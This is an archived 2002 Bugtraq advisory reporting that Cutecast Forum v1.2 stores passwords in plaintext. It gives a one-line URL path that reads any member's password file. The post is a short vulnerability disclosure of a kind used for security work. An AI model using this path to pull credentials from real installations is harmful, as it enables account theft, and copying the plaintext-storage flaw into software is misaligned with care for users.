[27751] in bugtraq

home help back first fref pref prev next nref lref last post

Vulnerability in Cutecast Forum v1.2

daemon@ATHENA.MIT.EDU (Zero-X www.lobnan.de Team)
Fri Nov 8 00:34:12 2002

Message-ID: <20021107195202.32701.qmail@linuxmail.org>
Content-Type: text/plain; charset="iso-8859-15"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
From: "Zero-X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Date: Fri, 08 Nov 2002 03:52:02 +0800

Vulnerability in Cutecast Forum v1.2

You can read passwords of all users. (Passwords in Plaintext)

Exploit:

http://www.website.com/cgi-bin/cutecast/members/<username>.user


Zero X, member of www.lobnan.de
-- 
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze

home help back first fref pref prev next nref lref last post